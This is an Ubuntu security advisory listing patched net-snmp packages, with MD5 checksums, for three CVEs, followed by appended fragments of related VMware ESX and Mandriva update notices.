    A security issue affects the following Ubuntu releases:

    Ubuntu 6.06 LTS Ubuntu 7.10 Ubuntu 8.04 LTS Ubuntu 8.10

    This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

    The problem can be corrected by upgrading your system to the following package versions:

    Ubuntu 6.06 LTS: libsnmp-perl 5.2.1.2-4ubuntu2.3 libsnmp9 5.2.1.2-4ubuntu2.3

    Ubuntu 7.10: libsnmp-perl 5.3.1-6ubuntu2.2 libsnmp10 5.3.1-6ubuntu2.2

    Ubuntu 8.04 LTS: libsnmp-perl 5.4.1~dfsg-4ubuntu4.2 libsnmp15 5.4.1~dfsg-4ubuntu4.2

    Ubuntu 8.10: libsnmp15 5.4.1~dfsg-7.1ubuntu6.1

    In general, a standard system upgrade is sufficient to effect the necessary changes.

    Details follow:

    Wes Hardaker discovered that the SNMP service did not correctly validate HMAC authentication requests. An unauthenticated remote attacker could send specially crafted SNMPv3 traffic with a valid username and gain access to the user's views without a valid authentication passphrase. (CVE-2008-0960)

    John Kortink discovered that the Net-SNMP Perl module did not correctly check the size of returned values. If a user or automated system were tricked into querying a malicious SNMP server, the application using the Perl module could be made to crash, leading to a denial of service. This did not affect Ubuntu 8.10. (CVE-2008-2292)

    It was discovered that the SNMP service did not correctly handle large GETBULK requests. (CVE-2008-4309)

    Updated packages for Ubuntu 6.06 LTS:

    Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.2.1.2-4ubuntu2.3.diff.gz
      Size/MD5:    75402 9655d984a47cec8e27efa4db0b227870
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.2.1.2-4ubuntu2.3.dsc
      Size/MD5:      838 17a17230a005c1acfd0569757e728fad
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.2.1.2.orig.tar.gz
      Size/MD5:  3869893 34159770a7fe418d99fdd416a75358b1
    

    Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-base_5.2.1.2-4ubuntu2.3_all.deb
      Size/MD5:  1152306 f7647cee4df8db87ab48c0d05635a973
    http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/tkmib_5.2.1.2-4ubuntu2.3_all.deb
      Size/MD5:   822946 b9b852c188937d1fffc06d4da01325d5
    

    amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.2.1.2-4ubuntu2.3_amd64.deb
      Size/MD5:   896620 a78012b3f0f13667081f97dc1a4d62e8
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9-dev_5.2.1.2-4ubuntu2.3_amd64.deb
      Size/MD5:  1497194 7d55b8d1e4ae0c45753bedcf536a1a5a
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9_5.2.1.2-4ubuntu2.3_amd64.deb
      Size/MD5:  1826252 0550c1401f9bbe5f345fd96484ed369c
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.2.1.2-4ubuntu2.3_amd64.deb
      Size/MD5:   889330 5ad0ddb2c610973166e4dd07769ba3d3
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.2.1.2-4ubuntu2.3_amd64.deb
      Size/MD5:   797086 18cf4210342b683d3ee24fe995329b55
    

    i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.2.1.2-4ubuntu2.3_i386.deb
      Size/MD5:   896880 298d27ea1ece6e80bb8931b9a5e61961
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9-dev_5.2.1.2-4ubuntu2.3_i386.deb
      Size/MD5:  1268472 acbca43ab7ea747fa3e4636d15ef997c
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9_5.2.1.2-4ubuntu2.3_i386.deb
      Size/MD5:  1710342 bd27290685bcf1d6a23eb8705d3367e7
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.2.1.2-4ubuntu2.3_i386.deb
      Size/MD5:   881838 58121bd9e4c845da7df4e540645e0e13
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.2.1.2-4ubuntu2.3_i386.deb
      Size/MD5:   794672 221d1c554bd89f50dc3ac9108a6cef6b
    

    powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.2.1.2-4ubuntu2.3_powerpc.deb
      Size/MD5:   913064 45a033b01c4b31ef90a92988bb5fb229
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9-dev_5.2.1.2-4ubuntu2.3_powerpc.deb
      Size/MD5:  1590124 b62aa5477d9307d311c811298b7ec3d9
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9_5.2.1.2-4ubuntu2.3_powerpc.deb
      Size/MD5:  1728094 5214ce9aebe3a8d7a28a1746a81ce8ea
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.2.1.2-4ubuntu2.3_powerpc.deb
      Size/MD5:   898580 86e6c1b5dfb5bf91f63d7c6786b7abae
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.2.1.2-4ubuntu2.3_powerpc.deb
      Size/MD5:   796092 1bab28407224f782b2c3ae04b4647333
    

    sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.2.1.2-4ubuntu2.3_sparc.deb
      Size/MD5:   896832 3d233db9682d5654fdad6bc6b5a649ba
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9-dev_5.2.1.2-4ubuntu2.3_sparc.deb
      Size/MD5:  1485268 064304ead0ca4653136376e8e9039e74
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9_5.2.1.2-4ubuntu2.3_sparc.deb
      Size/MD5:  1706490 cb76027eb8167e0866a81b93a4da28ed
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.2.1.2-4ubuntu2.3_sparc.deb
      Size/MD5:   883182 d1ffc12427d92be51efdba3349e74f9a
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.2.1.2-4ubuntu2.3_sparc.deb
      Size/MD5:   796374 0f3f749ebe4af6111fe49316639004e4
    

    Updated packages for Ubuntu 7.10:

    Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.3.1-6ubuntu2.2.diff.gz
      Size/MD5:    94646 8b6f9380d9f8c5514a1d4db729c6df04
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.3.1-6ubuntu2.2.dsc
      Size/MD5:     1287 f53866efd3ae4f3c939a77b1005e1f11
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.3.1.orig.tar.gz
      Size/MD5:  4210843 360a9783dbc853bab6bda90d961daee5
    

    Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-base_5.3.1-6ubuntu2.2_all.deb
      Size/MD5:   484306 f2d03276d1cdcef7e8b276ad8ca9595d
    http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/tkmib_5.3.1-6ubuntu2.2_all.deb
      Size/MD5:   901284 6889b371d4de92eb61bf83b89d8a8c37
    

    amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.3.1-6ubuntu2.2_amd64.deb
      Size/MD5:  2541692 1e6de4bd3c3baa444a2e1980a593a40e
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.3.1-6ubuntu2.2_amd64.deb
      Size/MD5:   968940 7efe4bdcb99f311f1c4bb2c3b9d24a4e
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp10_5.3.1-6ubuntu2.2_amd64.deb
      Size/MD5:  1200930 821861c24499cfdfa2a82c329c610c16
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.3.1-6ubuntu2.2_amd64.deb
      Size/MD5:   996572 00cc1a4c8c7924124984e666563e73d0
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.3.1-6ubuntu2.2_amd64.deb
      Size/MD5:   908792 a40763280a3bdbe60eca5e07c5d6c30c
    

    i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.3.1-6ubuntu2.2_i386.deb
      Size/MD5:  2321524 59d44616802197e1227cf88abddefe36
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.3.1-6ubuntu2.2_i386.deb
      Size/MD5:   967106 a6e5b308d889bdf6f5abe454e35ba474
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp10_5.3.1-6ubuntu2.2_i386.deb
      Size/MD5:  1124462 ec99daa26d0fafba6e9f0b874a23bf3d
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.3.1-6ubuntu2.2_i386.deb
      Size/MD5:   991956 cb20b6a4d68a858ffa0846431169d411
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.3.1-6ubuntu2.2_i386.deb
      Size/MD5:   907546 1ab5119e23a16e99203c113d49fc2723
    

    lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.3.1-6ubuntu2.2_lpia.deb
      Size/MD5:  2305548 da57690a3327196e0c3684735be23f2e
    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.3.1-6ubuntu2.2_lpia.deb
      Size/MD5:   968984 8da336a5fd871be10e6b8d66d3b9c9d3
    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp10_5.3.1-6ubuntu2.2_lpia.deb
      Size/MD5:  1074500 e4d6690a6a6a543fc0244a29cd350c9b
    http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.3.1-6ubuntu2.2_lpia.deb
      Size/MD5:   989566 2d2f4b1662e6a2dffafe8e98f00a15e7
    http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.3.1-6ubuntu2.2_lpia.deb
      Size/MD5:   907596 4274e006754ebc836132166e0f0429a0
    

    powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.3.1-6ubuntu2.2_powerpc.deb
      Size/MD5:  2641202 9b2ec56463ee715752b780aa332d8cd0
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.3.1-6ubuntu2.2_powerpc.deb
      Size/MD5:   985722 a2fca8426b7b51e98c39b91a468bf71f
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp10_5.3.1-6ubuntu2.2_powerpc.deb
      Size/MD5:  1154496 6073239f7ffead2a5b9c3357ada1602c
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.3.1-6ubuntu2.2_powerpc.deb
      Size/MD5:  1018596 af12cc55597a0d2d3a92b4b5d683bb14
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.3.1-6ubuntu2.2_powerpc.deb
      Size/MD5:   911866 57e2246930e712bdc1b039840d43af48
    

    sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.3.1-6ubuntu2.2_sparc.deb
      Size/MD5:  2527568 19b1a0971259a9b99f9c0386f5935bfc
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.3.1-6ubuntu2.2_sparc.deb
      Size/MD5:   970264 d8ae7f0bb10375ad487b14ba031cd013
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp10_5.3.1-6ubuntu2.2_sparc.deb
      Size/MD5:  1078842 2401fc4c40352b8c8013e8c5de3b0ecd
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.3.1-6ubuntu2.2_sparc.deb
      Size/MD5:   995228 16b230d3c718d8eb4a023126bd09d7f5
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.3.1-6ubuntu2.2_sparc.deb
      Size/MD5:   908708 1e410a8ddac41ad9faec901c5a638f29
    

    Updated packages for Ubuntu 8.04 LTS:

    Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg-4ubuntu4.2.diff.gz
      Size/MD5:    78642 b4acf50e47be498e579b934f32081d25
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg-4ubuntu4.2.dsc
      Size/MD5:     1447 0abcea5df87851df2aae7ebd1fc00e7a
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg.orig.tar.gz
      Size/MD5:  4618308 0ef987c41d3414f2048c94d187a2baeb
    

    Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-base_5.4.1~dfsg-4ubuntu4.2_all.deb
      Size/MD5:   526864 f3a131bf5a4f5c547573430cb66d410c
    http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/tkmib_5.4.1~dfsg-4ubuntu4.2_all.deb
      Size/MD5:   102072 2f276f50efdb7e34f7e61f132f7f7cd7
    

    amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_amd64.deb
      Size/MD5:  1796950 283c5a95206ab74062e0e30eba4e0890
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_amd64.deb
      Size/MD5:   142522 9fff294368a7eac39e37fa478ac6609d
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_amd64.deb
      Size/MD5:  1296694 d0646a1543c51f14a93b40f972bc1569
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_amd64.deb
      Size/MD5:   163178 0378a25e3b2a0bc80ddb8ec720b5557d
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_amd64.deb
      Size/MD5:    75960 fcba461f2e2376cad515329791e04a17
    http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_amd64.deb
      Size/MD5:    38512 21d9ecbc86a8e5965047d027e94fd324
    

    i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_i386.deb
      Size/MD5:  1556806 39e4f63b841c4b36c022017d66c12f58
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_i386.deb
      Size/MD5:   179478 5f08596ae997792920e238ff8cd2a7ba
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_i386.deb
      Size/MD5:  1098794 38bc61a5b403fb4f626a641a5f13e681
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_i386.deb
      Size/MD5:   157954 66e38c37639f3c68e7e4a933fa953ff3
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_i386.deb
      Size/MD5:    74116 50b3a4d0cfd38585d2711d30cf725e9d
    http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_i386.deb
      Size/MD5:    75038 98cdeec4b1014568b00107a82fc74418
    

    lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_lpia.deb
      Size/MD5:  1552018 d9dcab084f3b9bf3e8c36cb5db8f141e
    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_lpia.deb
      Size/MD5:   141508 96061180809cccc975e0d7079e07ed3e
    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_lpia.deb
      Size/MD5:  1171530 2d91048fe0a2ac9e3a4fddb84c67513e
    http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_lpia.deb
      Size/MD5:   155564 c67ba3aeb2535ee3e7fc4c89e90ba36a
    http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_lpia.deb
      Size/MD5:    74274 db05202893f516398bbe4e2153ef2d6e
    http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_lpia.deb
      Size/MD5:    35552 a75caf212ffb5a0eafe4ba2656c9aae1
    

    powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_powerpc.deb
      Size/MD5:  1874428 0ed8b5f4e6bad74d506d73447de00bd2
    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_powerpc.deb
      Size/MD5:   158374 dfcd7c4455b4bbd3f746368058d09a59
    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_powerpc.deb
      Size/MD5:  1238226 b5b3a81e956cdb14674d571694d1b6d0
    http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_powerpc.deb
      Size/MD5:   185314 5e9d8bd56493f75ae8a8691c530aa420
    http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_powerpc.deb
      Size/MD5:    83106 75dea32ec7152b7868fabf09d9d5a198
    http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_powerpc.deb
      Size/MD5:    42928 214fe703fced2e387b48b51dcbb1d6b7
    

    sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_sparc.deb
      Size/MD5:  1760062 ade4c08289d947d092a5b2ab06517cc7
    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_sparc.deb
      Size/MD5:   143860 62b7260d618531b0ed5e7871ab7b99a9
    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_sparc.deb
      Size/MD5:  1159702 28ea81660bbdd9d7982be58d225e8814
    http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_sparc.deb
      Size/MD5:   160236 196e493ce73905446a3764e73b99f332
    http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_sparc.deb
      Size/MD5:    75518 f24e4b0e3e4a7d97c28da99cdc0a47a5
    http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_sparc.deb
      Size/MD5:    38240 873f5e820e381ec2254ed520bcd09af0
    

    Updated packages for Ubuntu 8.10:

    Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg-7.1ubuntu6.1.diff.gz
      Size/MD5:    82260 85fb58aa81933f142bd937bca2e18341
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg-7.1ubuntu6.1.dsc
      Size/MD5:     1956 1ee06f6b731eae435af6a2d438ef909b
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg.orig.tar.gz
      Size/MD5:  4618308 0ef987c41d3414f2048c94d187a2baeb
    

    Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-base_5.4.1~dfsg-7.1ubuntu6.1_all.deb
      Size/MD5:   527650 9c56f3d70018b714895a61c0daba9498
    http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/tkmib_5.4.1~dfsg-7.1ubuntu6.1_all.deb
      Size/MD5:   103060 108eb50387ca46b4ee38ebb8722ced88
    

    amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb
      Size/MD5:  1815638 82385081fe2d4eeb1a6c94f9dae672ad
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb
      Size/MD5:   146154 1b6249e02e89213f2f4d2aa9c9123420
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb
      Size/MD5:  1315628 8443e091f2c63485a422236ad23e55cd
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb
      Size/MD5:   165522 154a05824b98e041ceac60ac83709ef4
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb
      Size/MD5:    77914 8d6e328f309e78bf1fcf21c2633d82ec
    http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb
      Size/MD5:    39930 6b7a1a67ca63b5c843ce66f3547b3c89
    

    i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_i386.deb
      Size/MD5:  1569568 dd0599b150eccee9889325d17a7b0769
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_i386.deb
      Size/MD5:   184264 52a54aebef81648164a5bc90f27b0cc5
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_i386.deb
      Size/MD5:  1119072 10c81fe283b25e7ad31fcfd88a2325f0
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_i386.deb
      Size/MD5:   156112 6296f0836bc9797ff48810c79965c3a5
    http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_i386.deb
      Size/MD5:    74476 bd96a6915eb97fed083aac4daa5f07cf
    http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_i386.deb
      Size/MD5:    77652 3e30e51c362dfa982a3b3197be081328
    

    lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb
      Size/MD5:  1557614 065f4575c7a2d257fa6b5b9d0cee454f
    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb
      Size/MD5:   144292 b55f2c4aff8a86499d7f38fd6e773f44
    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb
      Size/MD5:  1184272 84116fefdce279ce338ffc9614384c06
    http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb
      Size/MD5:   154444 ffe9e765a01695355bdb58008a2910f5
    http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb
      Size/MD5:    73746 762e75672fbd395d2d159513f5d572b0
    http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb
      Size/MD5:    36530 0a98b51b94a5f75d4131d657aa766579
    

    powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb
      Size/MD5:  1884632 a3ad023841ee605efa1e055712b44d9a
    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb
      Size/MD5:   161074 5586adea8200d2d5bf81f288b5bf7be2
    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb
      Size/MD5:  1249636 48ec688499fea1dc0ccb3091c0158fb8
    http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb
      Size/MD5:   181952 8ef5f6b9b6c6b8e4fcd5cb37147304a2
    http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb
      Size/MD5:    81802 965218126fb5a49cfcd9e20afeb49782
    http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb
      Size/MD5:    43048 09f2f9ed9f519ca5723411802e46d48b
    

    sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb
      Size/MD5:  1759316 46455cc355c1b808243eada0f134d00b
    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb
      Size/MD5:   145164 2cdb5b35db853c7c184a44022fc23cd8
    http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb
      Size/MD5:  1159834 cfff424e5bff38bb3ef9419f03465388
    http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb
      Size/MD5:   163042 354f7a5423a34c411c5f8620c66d3e58
    http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb
      Size/MD5:    76994 ca11bcf9a411f618e35e1d6b6ab8c8f9
    http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb
      Size/MD5:    38526 172493ec5df1866e2633e074c7f38775
    

    . OpenSSL Binaries Updated

    This fix updates the third party OpenSSL library. net-snmp Security update

    This fix upgrades the service console rpm for net-snmp to version net-snmp-5.0.9-2.30E.24. perl Security update

    This fix upgrades the service console rpm for perl to version perl-5.8.0-98.EL3.

    ESX


    ESX 3.0.3 build 104629 ESX Server 3.0.3 CD image md5sum: c2cda9242c6981c7eba1004e8fc5626d Upgrade package from ESX Server 2.x to ESX Server 3.0.3 md5sum: 0ad8fa4707915139d8b2343afebeb92b Upgrade package from earlier releases of ESX Server 3 to ESX Server 3.0.3 md5sum: ff7f3dc12d34b474b231212bdf314113 release notes: http://www.vmware.com/support/vi3/doc/releasenotes_esx303.html


    References:

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0960 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2292


    Updated Packages:

    Mandriva Linux 2007.1: 8db66ef5a5468d3fd72a47855230a28e 2007.1/i586/libnet-snmp10-5.3.1-3.2mdv2007.1.i586.rpm c951b17138ef11828b2ccf031d4cddaf 2007.1/i586/libnet-snmp10-devel-5.3.1-3.2mdv2007.1.i586.rpm 536a87919f32fac81964d0a907bf08fe 2007.1/i586/libnet-snmp10-static-devel-5.3.1-3.2mdv2007.1.i586.rpm 39e33947c21666dac5dbe5cfe103b26d 2007.1/i586/net-snmp-5.3.1-3.2mdv2007.1.i586.rpm 1eed5ebaff8f6f83befbf8d831900073 2007.1/i586/net-snmp-mibs-5.3.1-3.2mdv2007.1.i586.rpm 874db03c69584025e4d91049072d3c4e 2007.1/i586/net-snmp-trapd-5.3.1-3.2mdv2007.1.i586.rpm 11af93c879d8cd9353b7cb1826900222 2007.1/i586/net-snmp-utils-5.3.1-3.2mdv2007.1.i586.rpm 2c9e819eeb5fd472f6a0fe338d86182b 2007.1/i586/perl-NetSNMP-5.3.1-3.2mdv2007.1.i586.rpm 7a0806202ff8f3d838fa7958b636a449 2007.1/SRPMS/net-snmp-5.3.1-3.2mdv2007.1.src.rpm

